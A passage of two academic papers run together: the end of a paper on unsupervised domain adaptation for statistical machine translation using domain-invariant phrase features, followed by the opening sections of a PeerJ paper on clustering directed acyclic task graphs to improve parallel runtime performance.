verpflichtungen" to "legal obligations", which is a worse choice (at least according to BLEU) than "legal commitments" pro- duced by the baseline. We also present a brief analysis of latent subdomains induced by our projection frame- work. For each subdomain z we integrate the domain posteriors (P(z| ẽ) and P(z| f̃) and the source-target domain-coherence feature∣∣∣P(z| ẽ)−P(z| f̃) ∣∣∣). We hypothesize that when- ever we observe an improvement for a translation task with domain-informed features, this means that the corresponding latent subdomain z is close to the target translation domain. The results are presented in Table 8. Apparently, among the latent subdomains, z4, z5, z6, z9 are closest to the target domain of Hardware. Their derived feature functions are helpful in improving the translation accuracy for the task. Similarly, z1, z2, z5, z6, z9 and z11 are closest to Professional & Business, z6 is closest to Software, and z3 is closest to Legal. Meanwhile, z4, z5 and z12 are not relevant to the task of Software. Similarly, z3 is not relevant to Professional & Business, and z2, z5 and z10 are not relevant to Legal. Using topic models instead of latent domains. Our domain-invariance framework demands access to posterior distributions of latent domains for phrases. Though we argued for using our domain induction approach, other latent variable models can be used to compute these posteriors. One natural option is to use topic models, and more specifically LDA (Blei et al., 2003). Will our domain-invariance framework still work with topic models, and how closely related are the induced latent domains induced with LDA and our model? These are the questions we study in this section. We estimate LDA at the sentence level in a mono- lingual regime8 on one side of each parallel corpus (let us assume for now that this is the source side). When the model is estimated, we obtain the pos- terior distributions of topics (we denote them as z, as we treat them as domains) for each source-side sentence in the training set. Now, as we did with our phrase induction framework, we associate these posteriors with every phrase both in the source and in the target sides of that sentence pair. Phrase and phrase-pair features defined in Section 2 are com- puted relying on these probabilities averaged over the entire training set. We try both directions, that is also estimating LDA on the target side and transfer- ring the posterior probabilities to the source side. In order to estimate LDA, we used Gibbs sam- pling implemented in the Mallet package (McCal- lum, 2002) with default values of hyper-parameters (α = 0.01 and β = 0.01). Table 9 presents the results for the Legal task with three different sys- tem optimization settings. BLEU, METEOR and TER are reported. As the result suggests, using our induction framework tends to yield slightly better translation results in terms of METEOR and espe- cially BLEU. However, using LDA seems to lead to slightly better translation result in terms of TER. Topics in LDA-like models encode co-occurrence patterns in bag-of-word representations of sen- tences. In contrast, domains in our domain- induction framework rely on ngrams and word- alignment information. Consequently, these mod- 8Note that bilingual LDA models (e.g., see Hasler et al. (2014), Zhang et al. (2014)) could potentially produce better results but we leave them for future work. 108 English-German (Task: Legal) Dev Algorithms BLEU↑ METEOR↑ TER↓ In-domain Our 29.9 33.1 55.5 LDA (source) 29.9 33.1 55.4 LDA (target) 29.9 33.1 55.3 Mixed-domains Our 29.8 32.9 54.9 LDA (source) 29.7 32.9 54.8 LDA (target) 29.7 32.9 54.8 Mixed-domains (Exclude Legal) Our 29.6 32.8 54.6 LDA (source) 29.4 32.7 54.5 LDA (target) 29.4 32.7 54.6 Table 9: Comparison in latent domain induction with various algorithms. els are likely to encode different latent information about sentences. We also investigate translation per- formance when we use both coherence features from LDA and coherence features from our own frame- work. Table 10 shows that using all the induced co- herence features results in the best translation, no matter which translation metric is used. We leave the exploration of such an extension for future work. English-German (Task: Legal) Dev Algorithms BLEU↑ METEOR↑ TER↓ Mixed domains Our features 29.8 32.9 54.9 LDA (source) features 29.7 32.9 54.8 All Features 29.8 33.0 54.7 Table 10: Combination of all features. 5 Related Work and Discussion Domain adaptation is an important challenge for many NLP problems. A good survey of potential translation errors in MT adaptation can be found in Irvine et al (2013). Lexical selection appears to be the most common source of errors in domain adap- tation scenarios (Irvine et al., 2013; Wees et al., 2015). Other translation errors include reordering errors (Chen et al., 2013a; Zhang et al., 2015), align- ment errors (Cuong and Sima’an, 2015) and overfit- ting to the source domain at the parameter tuning stage (Joty et al., 2015). Adaptation in SMT can be regarded as injecting prior knowledge about the target translation task into the learning process. Various approaches have so far been exploited in the literature. They can be loosely categorized according to the type of prior knowledge exploited for adaptation. Often, a seed in-domain corpus exemplifying the target translation task is used as a form of prior knowledge. Various techniques can then be used for adaptation. For ex- ample, one approach is to combine a system trained on the in-domain data with another general-domain system trained on the rest of the data (e.g., see Koehn and Schroeder (2007), Foster et al. (2010), Bisazza et al. (2011), Sennrich (2012b), Razmara et al. (2012), Sennrich et al. (2013), Haddow (2013), Joty et al. (2015)). Rather than using the entire training data, it is also common to combine the in-domain system with a system trained on a selected subset of the data (e.g., see Axelrod et al. (2011), Koehn and Haddow (2012), Duh et al. (2013), Kirchhoff and Bilmes (2014), Cuong and Sima’an (2014b)). In some other cases, the prior knowledge lies in meta-information about the training data. This could be document-annotated training information (Eidel- man et al., 2012; Hu et al., 2014; Hasler et al., 2014; Su et al., 2015; Zhang et al., 2014), and domain- annotated sub-corpora (Chiang et al., 2011; Sen- nrich, 2012b; Chen et al., 2013b; Carpuat et al., 2014; Cuong and Sima’an, 2015). Some recent ap- proaches perform adaptation by exploiting a target domain development, or even only the source side of the development set (Sennrich, 2012a; Carpuat et al., 2013; Carpuat et al., 2014; Mansour and Ney, 2014). Recently, there was some research on adapting si- multaneously to multiple domains, the goal related to ours (Clark et al., 2012; Sennrich, 2012a). For instance, Clark et al. (2012) augment a phrase-based MT system with various domain indicator features to build a single system that performs well across a range of domains. Sennrich (2012a) proposed to cluster training data in an unsupervised fashion to build mixture models that yield good performance on multiple test domains. However, their approaches are very different from ours, that is minimizing risk associated with choosing domain-specific transla- tions. Moreover, the present work deviates radically from earlier work in that it explores the scenario where no prior data or knowledge is available about the translation task during training time. The focus of our approach is to aim for safer translation by re- warding domain-invariance of translation rules over latent subdomains that can be (still) useful on adap- 109 tation tasks. The present study is inspired by Zhang et al. (2014) which exploits topic-insensitivity that is learned over documents for translation. The goal and setting we are working on is markedly differ- ent (i.e., we do not have access to meta-information about the training and translation tasks at all). The domain-invariance induced is integrated into SMT systems as feature functions, redirecting the decoder to a better search space for the translation over adap- tation tasks. This aims at biasing the decoder to- wards translations that are less domain-specific and more source-target domain coherent. There is an interesting relation between this work and extensive prior work on minimum Bayes risk (MBR) objectives (used either at test time (Kumar and Byrne, 2004) or during training (Smith and Eis- ner, 2006; Pauls et al., 2009)). As with our work, the goal of MBR minimization is to select transla- tions that are less “risky". Their risk is due to the uncertainty in model predictions, and some of this uncertainty may indeed be associated with domain- variability of translations. Still, a system trained with an MBR objective will tend to output most frequent translation rather than the most domain- invariant one, and this, as we argued in the introduc- tion, might not be the right decision when applying it across domains. We believe that the two classes of methods are largely complementary, and leave fur- ther investigation for future work. At a conceptual level it is also related to regular- izers used in learning domain-invariant neural mod- els (Titov, 2011), specifically autoencoders. Though they also consider divergences between distributions of latent variable vectors, they use these divergences at learning time to bias models to induce represen- tations maximally invariant across domains. More- over, they assume access to meta-information about domains and consider only classification problems. 6 Conclusion This paper aims at adapting machine translation sys- tems to all domains at once by favoring phrases that are domain-invariant, that are safe to use across a variety of domains. While typical domain adapta- tion systems expect a sample of the target domain, our approach does not require one and is directly applicable to any domain adaptation scenario. Ex- periments show that the proposed approach results in modest but consistent improvements in BLEU, METEOR and TER. To the best of our knowledge, our results are the first to suggest consistent and sig- nificant improvement by a fully unsupervised adap- tation method across a wide variety of translation tasks. The proposed adaptation framework is fairly sim- ple, leaving much space for future research. One potential direction is the introduction of additional features relying on the assignment of phrases to do- mains. The framework for inducing latent domains proposed in this paper should be beneficial in this future work. The implementation of our subdomain- induction framework is available at https:// github.com/hoangcuong2011/UDIT. Acknowledgements We thank anonymous reviewers for their construc- tive comments on earlier versions. We also thank Hui Zhang for his help on expected Kneser-Ney smoothing technique. The first author is supported by the EXPERT (EXPloiting Empirical appRoaches to Translation) Initial Training Network (ITN) of the European Union’s Seventh Framework Programme. The second author is supported by VICI grant nr. 277-89-002 from the Netherlands Organization for Scientific Research (NWO). We thank TAUS for providing us with suitable data. References Amittai Axelrod, Xiaodong He, and Jianfeng Gao. 2011. Domain adaptation via pseudo in-domain data selec- tion. In Proceedings of EMNLP. Arianna Bisazza, Nick Ruiz, and Marcello Federico. 2011. Fill-up versus interpolation methods for phrase- based SMT adaptation. In IWSLT. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent dirichlet allocation. JMLR. Peter F. Brown, Vincent J. Della Pietra, Stephen A. Della Pietra, and Robert L. Mercer. 1993. The mathemat- ics of statistical machine translation: parameter esti- mation. Comput. Linguist. Marine Carpuat, Hal Daume III, Katharine Henry, Ann Irvine, Jagadeesh Jagarlamudi, and Rachel Rudinger. 2013. Sensespotting: Never let your parallel data tie you to an old domain. In Proceedings of ACL. 110 Marine Carpuat, Cyril Goutte, and George Foster. 2014. Linear mixture models for robust machine translation. In Proc. of WMT. Boxing Chen, George Foster, and Roland Kuhn. 2013a. Adaptation of reordering models for statistical ma- chine translation. In Proceedings of NAACL. Boxing Chen, Roland Kuhn, and George Foster. 2013b. Vector space model for adaptation in statistical ma- chine translation. In Proceedings of the ACL. Colin Cherry and George Foster. 2012. Batch tuning strategies for statistical machine translation. In Pro- ceedings of the NAACL-HLT. David Chiang, Steve DeNeefe, and Michael Pust. 2011. Two easy improvements to lexical weighting. In Pro- ceedings of ACL (Short Papers). Jonathan Clark, Chris Dyer, Alon Lavie, and Noah A. Smith. 2011. Better hypothesis testing for statistical machine translation: Controlling for optimizer insta- bility. In Proceedings of ACL (Short Papers). Jonathan Clark, Alon Lavie, and Chris Dyer. 2012. One system, many domains: Open-domain statistical ma- chine translation via feature augmentation. Trevor Cohn and Gholamreza Haffari. 2013. An infinite hierarchical bayesian model of phrasal translation. In Proceedings of the ACL. Hoang Cuong and Khalil Sima’an. 2014a. Latent do- main phrase-based models for adaptation. In Proceed- ings of EMNLP. Hoang Cuong and Khalil Sima’an. 2014b. Latent do- main translation models in mix-of-domains haystack. In Proceedings of COLING. Hoang Cuong and Khalil Sima’an. 2015. Latent domain word alignment for heterogeneous corpora. In Pro- ceedings of NAACL-HLT. Arthur Dempster, Nan Laird, and Donald Rubin. 1977. Maximum likelihood from incomplete data via the em algorithm. JRSS, SERIES B, 39(1):1–38. John DeNero, Dan Gillick, James Zhang, and Dan Klein. 2006. Why generative phrase models underperform surface heuristics. In Proc. of WMT. Michael Denkowski and Alon Lavie. 2011. Meteor 1.3: Automatic metric for reliable optimization and evalua- tion of machine translation systems. In Proc. of WMT. Kevin Duh, Graham Neubig, Katsuhito Sudoh, and Ha- jime Tsukada. 2013. Adaptation data selection us- ing neural language models: Experiments in machine translation. In Proceedings of the ACL. Vladimir Eidelman, Jordan Boyd-Graber, and Philip Resnik. 2012. Topic models for dynamic translation model adaptation. In ACL (Short Papers). George Foster, Cyril Goutte, and Roland Kuhn. 2010. Discriminative instance weighting for domain adapta- tion in statistical machine translation. In Proceedings of EMNLP. Michel Galley and Christopher D. Manning. 2008. A simple and effective hierarchical phrase reordering model. In Proceedings of EMNLP. Kuzman Ganchev, Ben Taskar, Fernando Pereira, and Jo ao Gama. 2009. Posterior vs parameter sparsity in latent variable models. In Proceedings of NIPS. Barry Haddow. 2013. Applying pairwise ranked optimi- sation to improve the interpolation of translation mod- els. In Proceedings of NAACL-HLT. Eva Hasler, Phil Blunsom, Philipp Koehn, and Barry Haddow. 2014. Dynamic topic adaptation for phrase- based mt. In Proceedings of EACL. Kenneth Heafield, Ivan Pouzyrevsky, Jonathan Clark, and Philipp Koehn. 2013. Scalable Modified Kneser-Ney Language Model Estimation. In Proceedings of the ACL (Volume 2: Short Papers). Yuening Hu, Ke Zhai, Vladimir Eidelman, and Jordan Boyd-Graber. 2014. Polylingual tree-based topic models for translation domain adaptation. In Proceed- ings of the ACL. Ann Irvine, John Morgan, Marine Carpuat, Daume Hal III, and Dragos Munteanu. 2013. Measuring machine translation errors in new domains. In TACL. Mark Johnson. 2007. Why doesn’t EM find good HMM POS-taggers? In Proceedings of EMNLP-CoNLL. Shafiq Joty, Hassan Sajjad, Nadir Durrani, Kamla Al- Mannai, Ahmed Abdelali, and Stephan Vogel. 2015. How to avoid unwanted pregnancies: Domain adapta- tion using neural network models. In Proceedings of EMNLP. Katrin Kirchhoff and Jeff Bilmes. 2014. Submodularity for data selection in machine translation. In EMNLP. Philipp Koehn and Barry Haddow. 2012. Towards effec- tive use of training data in statistical machine transla- tion. In Proceedings of the WMT. Philipp Koehn and Josh Schroeder. 2007. Experiments in domain adaptation for statistical machine translation. In Proceedings of WMT. Philipp Koehn, Franz Och, and Daniel Marcu. 2003. Statistical phrase-based translation. In Proceedings of NAACL. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007. Moses: Open source toolkit for statistical machine translation. In Proceed- ings of ACL. Philipp Koehn. 2004. Statistical significance tests for machine translation evaluation. In Proceedings of EMNLP. Philipp Koehn. 2005. Europarl: A Parallel Corpus for Statistical Machine Translation. In Proceedings of MTSummit. 111 Shankar Kumar and William J. Byrne. 2004. Minimum bayes-risk decoding for statistical machine translation. In HLT-NAACL. Saab Mansour and Hermann Ney. 2014. Unsupervised adaptation for statistical machine translation. In Pro- ceedings of WMT. Spyros Matsoukas, Antti-Veikko I. Rosti, and Bing Zhang. 2009. Discriminative corpus weight esti- mation for machine translation. In Proceedings of EMNLP. Andrew Kachites McCallum. 2002. Mal- let: A machine learning for language toolkit. http://mallet.cs.umass.edu. Markos Mylonakis and Khalil Sima’an. 2008. Phrase translation probabilities with itg priors and smoothing as learning objective. In Proceedings of EMNLP. Graham Neubig, Taro Watanabe, Eiichiro Sumita, Shin- suke Mori, and Tatsuya Kawahara. 2011. An unsuper- vised model for joint phrase alignment and extraction. In Proceedings of ACL-HLT. Franz Och and Hermann Ney. 2003. A systematic com- parison of various statistical alignment models. Com- put. Linguist., pages 19–51. Franz Och and Hermann Ney. 2004. The alignment tem- plate approach to statistical machine translation. Com- put. Linguist., pages 417–449. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. Bleu: A method for automatic evalu- ation of machine translation. In Proceedings of ACL. Adam Pauls, John DeNero, and Dan Klein. 2009. Con- sensus training for consensus decoding in machine translation. In Proceedings of EMNLP. Majid Razmara, George Foster, Baskaran Sankaran, and Anoop Sarkar. 2012. Mixing multiple translation models in statistical machine translation. In Proceed- ings of ACL. Rico Sennrich, Holger Schwenk, and Walid Aransa. 2013. A multi-domain translation model framework for statistical machine translation. In Proceedings of ACL. Rico Sennrich. 2012a. Mixture-modeling with unsuper- vised clusters for domain adaptation in statistical ma- chine translation. In Proceedings of the EAMT. Rico Sennrich. 2012b. Perplexity minimization for translation model domain adaptation in statistical ma- chine translation. In Proceedings of EACL. David A. Smith and Jason Eisner. 2006. Minimum risk annealing for training log-linear models. In Proceed- ings of the COLING/ACL. Matthew Snover, Bonnie Dorr, R. Schwartz, L. Micciulla, and J. Makhoul. 2006. A study of translation edit rate with targeted human annotation. In Proceedings of AMTA. Jinsong Su, Deyi Xiong, Yang Liu, Xianpei Han, Hongyu Lin, Junfeng Yao, and Min Zhang. 2015. A context- aware topic model for statistical machine translation. In Proceedings of the ACL-IJCNLP. Ivan Titov. 2011. Domain adaptation by constraining inter-domain variability of latent feature representa- tion. In Proceedings of ACL. Marlies van der Wees, Arianna Bisazza, Wouter Weerkamp, and Christof Monz. 2015. What’s in a Domain? Analyzing Genre and Topic Differences in SMT. In Proceedings of ACL-IJCNLP (short paper). Hui Zhang and David Chiang. 2014. Kneser-Ney Smoothing on Expected Counts. In Proceedings of ACL. Min Zhang, Xinyan Xiao, Deyi Xiong, and Qun Liu. 2014. Topic-based dissimilarity and sensitivity mod- els for translation rule selection. JAIR. Biao Zhang, Jinsong Su, Deyi Xiong, Hong Duan, and Junfeng Yao. 2015. Discriminative reordering model adaptation via structural learning. In IJCAI. 112 work_gcygeykq7ffsnenhntlew223ma ---- Submitted 10 September 2019 Accepted 20 November 2019 Published 13 January 2020 Corresponding author Bérenger Bramas, berenger.bramas@inria.fr Academic editor Gang Mei Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.247 Copyright 2020 Bramas and Ketterlin Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Improving parallel executions by increasing task granularity in task-based runtime systems using acyclic DAG clustering Bérenger Bramas1,2 and Alain Ketterlin1,2,3 1 CAMUS, Inria Nancy - Grand Est, Nancy, France 2 ICPS Team, ICube, Illkirch-Graffenstaden, France 3 Université de Strasbourg, Strasbourg, France ABSTRACT The task-based approach is a parallelization paradigm in which an algorithm is transformed into a direct acyclic graph of tasks: the vertices are computational elements extracted from the original algorithm and the edges are dependencies between those. During the execution, the management of the dependencies adds an overhead that can become significant when the computational cost of the tasks is low. A possibility to reduce the makespan is to aggregate the tasks to make them heavier, while having fewer of them, with the objective of mitigating the importance of the overhead. In this paper, we study an existing clustering/partitioning strategy to speed up the parallel execution of a task-based application. We provide two additional heuristics to this algorithm and perform an in-depth study on a large graph set. In addition, we propose a new model to estimate the execution duration and use it to choose the proper granularity. We show that this strategy allows speeding up a real numerical application by a factor of 7 on a multi-core system. Subjects Algorithms and Analysis of Algorithms, Distributed and Parallel Computing, Scientific Computing and Simulation Keywords Task-based, Graph, DAG, Clustering, Partitioning INTRODUCTION The task-based (TB) approach has become a popular method to parallelize scientific applications in the high-performance computing (HPC) community. Compared to the classical approaches, such as the fork-join and spawn-sync paradigms, it offers several advantages as it allows to describe the intrinsic parallelism of any algorithms and run parallel executions without global synchronizations. Behind the scenes, most of the runtime systems that manage the tasks use a direct acyclic graph where the nodes represent the tasks and the edges represent the dependencies. In this model, a task becomes ready when all its predecessors in the graph are completed, which causes the use a local synchronization mechanism inside the runtime system to manage the dependencies. There are now many task-based runtime systems (Danalis et al., 2014; Perez, Badia & Labarta, 2008; Gautier et al., 2013; Bauer et al., 2012; Tillenius, 2015; Augonnet et al., 2011; Bramas, 2019b) and each of them has its own specificity, capabilities and interface. Moreover, the well-known and How to cite this article Bramas B, Ketterlin A. 2020. Improving parallel executions by increasing task granularity in task-based runtime systems using acyclic DAG clustering. PeerJ Comput. Sci. 6:e247 http://doi.org/10.7717/peerj-cs.247 https://peerj.com/computer-science mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.247 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.247 widely used OpenMP standard (OpenMP Architecture Review Board, 2013) also supports the tasks and dependencies paradigm since version 4. The advantage of the method to achieve high-performance and facilitate the use of heterogeneous computing nodes has been demonstrated by the development of many applications in various fields (Sukkari et al., 2018; Moustafa et al., 2018; Carpaye, Roman & Brenner, 2018; Agullo et al., 2016; Agullo et al., 2017; Agullo et al., 2015; Myllykoski & Mikkelsen, 2019). However, multiple challenges remain open to bring the task-based approach to non-HPC experts and to support performance portability. In our opinion, the two main problems on a single computing node concern the scheduling and granularity. The scheduling is the distribution of the tasks over the processing units, i.e., the selection of a task among the ready ones and the choice of a processing unit. This is a difficult problem, especially when using heterogeneous computing nodes as it cannot be solved optimally in general. Much research is continuously conducted by the HPC and the scheduling communities to provide better generic schedulers (Bramas, 2019a). The granularity issue is related to the size of the tasks. When the granularity is too small, the overhead of task management, and the potential data movements, becomes dominant and can dramatically increase the execution time due to the use of synchronizations (Tagliavini, Cesarini & Marongiu, 2018). On the other hand, when the granularity is too large, it reduces the degree of parallelism and leaves some processing units idle. Managing the granularity can be done at different levels. In some cases, it is possible to let the developer adapt the original algorithms, computational kernels, and data structures, but this could require significant programming effort and expertise (Bramas, 2016). An alternative, as we aim to study in this paper, is to investigate how to cluster the nodes of task graphs to increase the granularity of the tasks and thus obtain faster execution by mitigating the overhead from the management of the dependencies. An important asset of this approach is that working at the graph level allows creating a generic method independent from the application and what is done at the user level, but also independent of the task-based runtime system that will be used underneath. While graph partitioning/clustering is a well-studied problem, it is important to note that the obtained meta-DAG (direct acyclic graph) must remain acyclic, i.e., the dependencies between the cluster of nodes should ensure to be executable as a graph of tasks, and keep a large degree of parallelism. Hence, the usual graph partitioning methods do not work because they do not take into account the direction of the edges (Hendrickson & Kolda, 2000). Moreover, the DAG of tasks we target can be of several million nodes, and we need an algorithm capable to process them. In the current study, we use a generic algorithm that has been proposed to solve this problem (Rossignon et al., 2013), and we refer to it as the general DAG clustering algorithm (GDCA). The contributions of the paper are the following: • We provide two variants of the GDCA, which change how the nodes are aggregated and allow to have clusters smaller than the targeted size; Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 2/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 1An implementation of our method is publicly available at https://gitlab.inria. fr/bramas/dagpar. Besides, we provide the test cases used in this paper at https: //figshare.com/projects/Dagpar/71198. • We provide a new model to simulate the execution of a DAG, by considering that there are overheads in the execution of each task, but also while releasing or picking a task, and we use this model to find the best clustering size; • We evaluate and compare DGCA and our approach on a large graph set using emulated executions; • We evaluate and compare DGCA and our approach on Chukrut (Conservative Hyperbolic Upwind Kinetic Resolution of Unstructured Tokamaks) (Coulette et al., 2019) that computes the transport equation on a 2D unstructured mesh. The paper is organized as follows. In ‘Related Work’, we summarize the related work and explain why most existing algorithms do not solve the DAG of tasks clustering problem. Then, in ‘Problem Statement and Notations’, we describe in detail the DAG of tasks clustering problem. We introduce the modifications of the GDCA in ‘DAG of Tasks Clustering’. Finally, we evaluate our approach in ‘Experimental Study’. The source code of the presented method and all the material needed to reproduce the results of this paper are publicly available1. RELATED WORK Partitioning or clustering usually refers to dividing a graph into subsets so that the sum of costs on edges between nodes in different subsets is minimum. However, our objective here is not related to the costs of the edges, which we consider null, but to the execution time of the resulting graph in parallel considering a given number of threads and runtime overhead. Hence, while it is generally implicit that partitioning/clustering is related to the edge cut, we emphasize that it should be seen as a graph symbolic transformation and that the measure of quality and final objective differ depending on the problem to solve. Partitioning tends to refer to finding a given number of subgraphs, which is usually much lower than the number of nodes. In fact, once a graph is partitioned, it is usually dispatched over different processes and thus there must be as many subgraphs as there are processes, whereas clustering is more about finding subgraphs of a given approximate size or bounded by a given size limit, where nodes are grouped together if it appears that they have a certain affinity. This is a reason why the term clustering is also used to describe algorithms that cluster indirect graphs by finding hot spots (Schaeffer, 2007; Xu & Tian, 2015; Shun et al., 2016). Moreover, the size of a cluster is expected to be much lower than the number of nodes. The granularity problem of the DAG of tasks with a focus on the parallel execution has been previously studied. Sarkar and Hennessy designed a method to execute functional programs at a coarse granularity because working at fine granularity, i.e. at the instruction level, was inefficient on general purpose multiprocessors (Sarkar & Hennessy, 1986; Sarkar, 1989). They proposed a compile-time clustering approach to achieve the trade-off between parallelism and the overhead of exploiting parallelism and worked on graphs obtained directly from the source code. As we do in the current paper, they focused on the performance, i.e. best execution time, as a measure of the quality of the clustering and their estimation of execution times were based on the number of processors, communication Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 3/26 https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/Dagpar/71198 https://figshare.com/projects/Dagpar/71198 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 2The thesis that includes this final version is written in French. and scheduling overhead. However, their clustering algorithm is different from ours. It starts by considering each node as a cluster and successively merges them until it obtains a single subgraph while keeping track of the best configuration found so far to be used at the end. By doing so, their algorithm has above quadratic complexity and thus is unusable to process very large graphs. Also, in our case, we do not take communication into account, and we consider that some parts of the scheduling overhead are blocking: no threads can peek a task when another thread is already interacting with the scheduler. More recently Rossignon et al. (2013) proposed GDCA to manage DAG of fine grain tasks on multi-core architectures. Their first solution is composed of three main algorithms called sequential, front and depth front. The sequential algorithm puts together a task that has only one predecessor with its parent. The front algorithm reduces the width of the graph at each level. The depth front performs a breadth-first traversal of the descendants of a task to aggregate up to a given number of tasks together. They extended this last algorithm (Rossignon, 2015) by proposing a generic method, GDCA, that we use in the current study2. The authors also provided a new execution model to simulate the execution of a DAG where they use an overhead per task and a benefit coefficient for aggregation. In a more general context, the community has focused on indirect graph partitioning. A classical approach, called the two-way partitioning, consists in splitting a graph into two blocks of roughly equal size or in minimizing the edge cut between the two blocks (Kernighan & Lin, 1970; Fiduccia & Mattheyses, 1982). The method can be applied recursively multiple times until the desired number of subgraphs is reached. Later, multi- way methods have been proposed (Hendrickson & Leland, 1995; Karypis & Kumar, 1998; Karypis et al., 1999) and most of them have been done in the context of very-large-scale integration (VLSI) in an integrated circuit. The motivation is to partition large VLSI networks into smaller blocks of roughly equal size to minimize the interconnections between the blocks. The multi-way partitioning has been improved by taking into account the direction of the edges in the context of Boolean networks (Cong, Li & Bagrodia, 1994). The authors showed that considering the direction of the edges is very helpful, if not mandatory, in the design in order to have acyclic partitioning. The problem of acyclic DAG partitioning has also been studied by solving the edge- cut problem, i.e., by minimizing the number of weights of the edges having endpoints in different parts and not by focusing on the execution time (Herrmann et al., 2017). We argue that the execution time is the only criteria that should be evaluated and that measuring the edge-cut coefficient is not accurate to estimate the benefit of the clustering. Other studies have focused on partitioning with special constraints, such as finding a minimum cost partition of the graph into subsets of size less than or equal to a criteria (Kernighan, 1971), which can be seen as dividing a program into pages of fixed size to minimize the frequency of inter-page transitions. The problem also exists with FPGA, where a complete program does not fit in the field and thus should be divided in sub-parts with the objective of minimizing the re-programming (Purna & Bhatia, 1999). In linear algebra, the LU factorization can be represented as a tree graph that can be partitioned in linear time (Pothen & Alvarado, 1992). Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 4/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 The real application we used to assess our method solves the transport equation on unstructured meshes. Task-based implementations to solve the transport equation on a grid (i.e. structured and regular mesh) have already been proposed by Moustafa et al. (2018). The authors have created a version on top of the ParSEC runtime system where they partitioned the mesh and avoided working on the graph of tasks. Working on the mesh is another way to partition the graph, but this was possible in their case because the dependencies on the mesh were known and regular. The dependencies were not impacted by the clustering because an inter-partition dependency would simply be transformed into the exchange of a message. In other words, a process could work on its sub-graph even if some of its nodes are pending for input that will be sent by other processes. This is quite different from our approach, as we consider that a sub-graph is transformed into a macro-task, and hence all input dependencies must be satisfied before a thread starts to work on it. PROBLEM STATEMENT AND NOTATIONS Consider a DAG G(V ,E) where the vertices V are tasks and the edges E are the dependencies between those. The clustering problem of a DAG of tasks consists in finding the best clusters to obtain the minimal makespan possible when the DAG is executed on a specific hardware or execution model. Implicitly, the hardware or execution model should have some overheads, which could come from the management of the tasks for example, or the minimal execution time will always be obtained without clustering, i.e. on irrealistic hardware without overhead, any clustering of tasks will reduce the degree of parallelism without offering any advantages. Finding the optimal solution is NP-complete (Johnson & Garey, 1979) because it requires to test all the possible combinations of clusters. Moreover, evaluating a solution is performed by emulating a parallel execution, which has a complexity of O(V log(W )+E), where W is the number of workers and usually considered constant. In this paper, we solve a sub-problem that we call the clustering problem of a DAG of tasks with no-communications since we consider that the weights of the edges are insignificant and the edges are only here to represent the dependencies. This problem is met when moving data has no cost or is negligible, which is the case if the workers are threads and the NUMA effects negligible or if we use processes but have a way to hide communication with computation. Classical partitioning algorithms for indirected graphs cannot be used because they will not obtain an acyclic macro-graph. Formally, a macro-graph remains acyclic if for any edge a→b the corresponding clusters C(a)≤C(b) (note that C(a)=C(b) means that a and b are in the same cluster). This is also know as the convexity constraint (Sarkar & Hennessy, 1986) where we say that a subgraph H of graph G is convex if any path P(a,b), with a, b ∈H, is completely contained in H. Consequently, one way to solve the problem would be to find a valid topological order of the nodes and divide it into clusters. We write M the desired size of clusters, which should be seen as an upper limit such that no cluster will have more than M nodes. Parallel efficiency and edge cut. There is a relation between the edge-cut and the parallel execution when the edges represent communication costs between cluster owners. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 5/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.247 (a) (b) Figure 1 Example of clustering a DAG of 7 nodes targeting cluster of M = 2 nodes. If each edge has a weight of 1, the cut cost is 7 for (A) and 8 for (B). If each node is a task of cost 1 and edges are not taken into account, the parallel execution duration is 7 units for (A) and 5 units for (B). If each node is a task of cost 1 and edges are considered as communication of 1 unit sent sequentially after completion of the clus- ter, the parallel execution duration is 11 units for (A) and 9 units for (B). Full-size DOI: 10.7717/peerjcs.247/fig-1 (a) (b) Figure 2 Example of clustering a DAG of 7 nodes targeting cluster of M = 2 nodes. If each edge has a weight of 1, the cut cost is 4 for (A) and 5 for (B). If each node is a task of cost 1 and edges are not taken into account, the parallel execution duration is 7 units for (A) and 5 units for (B). If each node is a task of cost 1 and edges are considered as communication of 1 unit sent sequentially after completion of the clus- ter, the parallel execution duration is 10 units for (A) and 6 units for (B). Full-size DOI: 10.7717/peerjcs.247/fig-2 However, looking only at the edge-cut is not relevant when the final and only objective is the parallel efficiency. Moreover, this is even truer in our case because the weights of the edges are neglected. To illustrate the differences, we provide in Figs. 1 and 2 examples that demonstrate that when attempting to obtain a faster execution, the edge-cut is not the most important feature. In both examples, the configuration with the lowest edge-cut is slower when executed in parallel whether communications are taken into account or not. Clustering and delay in releasing dependencies. Traditionally, graph partitioning is used to distribute the workload on different processes while trying to minimize communications. In our case, however, a cluster is a macro-task and is managed like a task: it has to wait Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 6/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-1 https://doi.org/10.7717/peerjcs.247/fig-2 http://dx.doi.org/10.7717/peerj-cs.247 (a) (b) (c) Figure 3 Example of clustering three DAGs of eight nodes targeting in two cluster of M = 4 nodes. The obtained meta-DAG is the same despite the original dependencies between the nodes, and the cluster on the right will have to wait that the cluster on the left is fully executed to become ready. (A) Graph with a dependency between the two first nodes. (B) Graph with dependencies between first and last nodes. (C) Graph with multiple dependencies. Full-size DOI: 10.7717/peerjcs.247/fig-3 for all its dependencies 